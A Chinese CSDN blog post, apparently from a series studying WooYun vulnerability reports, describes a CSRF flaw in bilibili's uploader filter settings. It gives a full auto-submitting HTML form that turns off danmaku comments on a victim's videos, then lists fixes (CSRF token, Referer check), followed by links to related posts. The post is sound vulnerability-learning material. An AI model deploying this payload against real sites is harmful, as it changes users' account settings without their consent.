【漏洞学习——CSRF】bilibili某处csrf漏洞

最新推荐文章于 2025-03-04 06:37:25 发布
最新推荐文章于 2025-03-04 06:37:25 发布
阅读量3.4k 收藏 1
点赞数 1
分类专栏: 【渗透测试实战】 # 乌云漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/84390831
版权

漏洞细节

此漏洞可以针对up主,关闭下列三项弹幕权限,使其发稿视频没有弹幕!
csrf位置在用户中心-->过滤管理中

http://member.bilibili.com/#gl_manage

poc

<html>
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title>CSRF/exploit--bilibili</title>
   </head>

    <body>
   <form action="http://member.bilibili.com/video_manage.do?act=save_filter" method="POST">
      <input type="hidden" name="format" value="json" />
      <input type="hidden" name="accept_guest" value="0" />
      <input type="hidden" name="accept_spcmt" value="0" />

      <input type="hidden" name="accept_advcmt" value="0" />
      <input type="hidden" name="block_group" value="" />
      <input type="hidden" name="new_filters" value="[]" />
    </form>
   </body>
 <script>
      document.forms[0].submit();
 </script>
</html>

修复方案

(1)加上token
(2)验证reffer

 

通过bilibili_api获取bilibili弹幕+绘制词云的方法
weixin_36285139的博客
08-04 1208
通过bilibili_api获取bilibili弹幕+绘制词云的方法 刚接触python 随手做一些自己感兴趣的项目,看到了一个通过bilibili_api三行代码获取弹幕的教程(vx公号:天作之程(jhtmtzzc))使用的是bilibili_api ,是2020年1月份发布的接口,可以很方便的获取弹幕、视频信息、评论等。 由于自己学艺不精,后续词云的简略代码没怎么看懂,梳理了一遍把整个的学习内容记录下来。主要参考的为bilibili_api的教程和词云的生成教程(https://blog.csdn.ne
漏洞学习——SSRF】bilibili某分站从信息泄露到ssrf再到命令执行
Fly_鹏程万里
02-22 1079
漏洞细节 这个只是memcache的案例,如果是redis更好利用了0x00 前言 扫描器时常会扫描到一些信息泄露,如discuz的配置文件 /config/config_global.php~  里面时常带有数据库密码等,但又苦于内网,十分尴尬。0x01 个例分析 以bilibili这个为例 http://bbs.biligame.com/config/config_global.php~  ...
CSRF 攻击详解:原理、案例与防御
最新发布
weixin_62428445的博客
03-04 981
CSRF 攻击利用浏览器自动携带 Cookie 的特点,让受害者在不知情的情况下执行敏感操作。在 CTF 竞赛中,题目往往会设计场景,让参赛者通过 CSRF 触发反射型 XSS,从而获取管理员页面中的 flag。本文详细介绍了 CSRF 攻击的原理、常见方式以及一个实战案例,并讨论了如何防御此类攻击。理解并掌握 CSRF 攻击有助于你在 CTF 中快速识别并利用漏洞,同时也能提高你对 Web 安全防护措施的理解。
PicGo配置Bilibili图床
米不开朗基罗的博客
02-03 1385
Picgo 配置Bilibili 图床 picgo-plugin-bilibili 为 PicGo 开发的一款插件,新增了B站图床 图床。 使用用户动态的图片上传API。填写SESSDATA即可,获取方式在下面。 在线安装获取B站SESSDATA图片样式解决B站防盗链(403) 在线安装 在线安装 打开 PicGo 详细窗口,选择插件设置,搜索bili安装,然后重启应用即可。 离线安装 克隆该项目,复制项目到 以下目录: Windows: %APPDATA%\picgo\Linux: $XDG_CONF
CSRF是什么?
别抢我蓝buff
02-09 492
跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作...
csrf 与 samesite
mgxcool的专栏
01-13 2308
很多人在学习csrf的时候,书本和文章上都会写到,在a站点面嵌入一个b站点的链接,那么浏览器在请求b页面的资源时会自动带上b的cookie。 不过我觉得这些文章的内容已经有些过时了,近期在解决内部的一个csrf问题时,发现当前浏览器已经默认启用了cookie中的samesite保护机制,这种跨域的csrf想利用已经很难了。 简单来说就是服务端在返回set-cookie时,可以加上一个samesite属性,这个属性有三个值:lax/strict/none lax:跨域的请求不会带上cookie,不过如果
CSRF攻击和防御
mubanxia的博客
05-28 304
CSRF攻击和防御 CSRF(跨站点请求伪造)存在于这样的情况,一个宅A登陆B站,输入了用户名和密码,通过验证后,B站产生cookie信息并返回给浏览器。A没有关闭B站,在同一浏览器下打开了黑客发来的网站C,网站C中隐藏着一段功能为获取B站cookie的代码。此时恰巧B站和A的session尚未过期,浏览器的cookie还存有A的登陆信息。那么A会在自己不知情的情况下,用A自己的身份给黑客发去cookie。 CSRF漏洞检测: HTTP的头含有一个referer字段,这个字段包含了HTTP请求的来源地址。如
CSRF跨站请求伪造——原理及复现
qq_41679358的博客
08-11 3392
转自行云博客https://www.xy586.top/ 原理 CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性 你这可以这么理解CSRF攻击:攻击者盗用了.
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3463
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
csrf绕过token
Bu2n的博客
02-12 1797
以pikachu靶场为例,绕过token讲解 https://www.bilibili.com/video/BV1qm4y1Z7o5/ 钓鱼网站源码 pikachu_csrf_token.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Document</title> </head> <body>
仿BiLiBiLi源码
09-01
"仿BiLiBiLi源码"项目则为我们提供了一个深入了解此类应用内部机制的机会,通过分析其源代码,我们可以学习到如何构建一个类似的应用。 【核心知识点】 1. **前端技术栈**:BiLiBiLi的前端通常会采用现代Web开发...
通过bilibili_api获取bilibili弹幕+绘制词云的方法!
爬遍所有网站
08-28 1953
由于自己学艺不精,后续词云的简略代码没怎么看懂,梳理了一遍把整个的学习内容记录下来。主要参考的为bilibili_api的教程和词云的生成教程(https://blog.csdn.net/itanders/article/details/88858415) 自己的环境:python3.7;pycharm编译器 一、bilibili_api获取弹幕 这部分代码如下: #爬取bilibili弹幕 from bilibili_api import Verify from bilibili_api.vide
bilibili 0粉获取rtmp推流码
qq_49081865的博客
10-07 5555
b站只是把开始直播的按钮藏起来了,接口还在。首先随便进入一个直播间打开F12开发者模式,发送一个弹幕,在网络下面找到send这个包,包里面找到标头和负载。复制cookie去这个网站https://kgtools.cn/compression/cookie。响应response里面有地址和推流码,我就不放我的了,你们自己看把。点这个链接,进去之后地址栏url里面就有room_id。再去找csrf,再刚才那个包的负载下面有。这就找到csrf了,再去找room_id。4.粘贴到python脚本中。
B站协议登录到实现各种功能完整代码(专栏总结)
xk
10-21 2498
B站协议登录、点赞、收藏、转发实现及代码、关注,动态转发实现动态抽奖实现及代码,直播预约抽奖实现及代码
3行!仅3行代码就能抓取B站(弹幕、评论、用户)数据
weixin_48794920的博客
08-06 1124
今天介绍一个获取B站数据的Python扩展库-bilibili_api 可以获取的数据包括: video-视频模块 user-用户模块 dynamic-动态模块 这次用“Running Man”十周年特辑的视频,来做个获取弹幕的Demo。 我是对比 没有对比,就没有伤害,就像最近的“哈工大”某学生和“浙大”某学生一样。 这是之前获取弹幕的过程: 1、弹幕数据接口 https://comment.bilibili.com/123072475.xml (一个固定的url地址 + 视频的cid + .xml) 2
最新哔哩哔哩邮箱绑定接口签名JS逆向分析
猿小白的博客
10-24 963
本章教程主要逆向分析 哔哩哔哩邮箱绑定接口biliCSRF 和mid 参数。教程仅供学习参考,请勿滥用,由此带来的法律责任需由自己承担。
bilibili直播间利用python爬虫自动发送弹幕
fzq13994952987的博客
09-15 4782
打开bilibili,在已登录状态下随便进入一个直播间,发送弹幕666 关于时间戳:时间戳是指格林威治时间1970年01月01日00时00分00秒(北京时间1970年01月01日08时00分00秒)起至现在的总毫秒数。通俗的讲, 时间戳是一份能够表示一份数据在一个特定时间点已经存在的完整的可验证的数据。 它的提出主要是为用户提供一份电子证据, 以证明用户的某些数据的产生时间。 ht...
【python爬虫】获取B站cookie教程
lmy6688的博客
08-31 1879
msg1 = messagebox.askyesno(title = "提示", message = "注销后cookie将失效,是否注销登录?btn1 = Button(root, width=10, text='注销登录', command=cancel_login)print(f"Cookies值有效, {login_url['data']['uname']}, 已登录!print('Cookies值已经失效,请重新扫码登录!v1.set('扫码成功')v1.set('等待扫码')
获取bilibili直播间弹幕
01-18
### 获取 Bilibili 直播间弹幕 API 或方法 #### 使用 WebSocket 实现 WebSocket 是一种用于浏览器和服务器之间双向通信的技术,在获取实时弹幕方面具有优势。对于 Flutter/Dart 和 Java 的实现方式,可以通过连接到 B 站官方提供的 WebSocket 地址来接收直播间内的弹幕信息[^1]。 ```dart import 'package:web_socket_channel/io.dart'; void main() { var channel = IOWebSocketChannel.connect('wss://broadcastlv.chat.bilibili.com/sub'); channel.stream.listen((message) { print(message); }); } ``` 此代码展示了如何建立与 B 站直播间的 WebSocket 连接并监听传入的消息流。需要注意的是实际应用中还需要处理认证以及消息解析等问题。 #### HTTP 请求库 Requests 方法 (Python) 另一种方案是利用 `requests` 库向特定 URL 发送 GET 请求从而获得 JSON 格式的响应体,其中包含了最新的几条弹幕内容。这种方式适用于不需要持续更新场景下的简单抓取需求[^2]。 ```python import requests def get_barrage(room_id): url = f"http://api.live.bilibili.com/ajax/msg?roomid={room_id}" response = requests.get(url).json() data = response['data']['room'] for item in reversed(data): # 反转列表以按时间顺序显示最新弹幕 print(item) get_barrage("指定的房间ID") ``` 上述 Python 脚本定义了一个函数用来根据给定的房间 ID 抓取最近一段时间内发送过的所有弹幕,并将其打印出来。 #### 利用 bilibili_api 库简化操作 为了更方便快捷地访问 B 站的各项功能,包括但不限于获取视频详情、评论区留言及弹幕等资源,可以考虑安装第三方开发维护的支持多语言版本(如 Python)的 SDK —— `bilibili_api` 。它不仅封装好了必要的接口调用逻辑而且提供了详尽文档指导使用者快速上手[^3][^4]。 ```python from bilibili_api import Verify, VideoInfo verify = Verify(sessdata="个人账户对应的sessdata", csrf="bili_jct") video_info = VideoInfo(bvid="目标视频编号", verify=verify) with open(r'保存路径', 'a') as file: for danmu_item in video_info.get_danmaku(): file.write(danmu_item.text + '\n') ``` 这段脚本实现了将某部作品下所有的弹幕逐行写入本地文件的功能,便于之后做进一步的数据分析工作比如制作词云图等等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值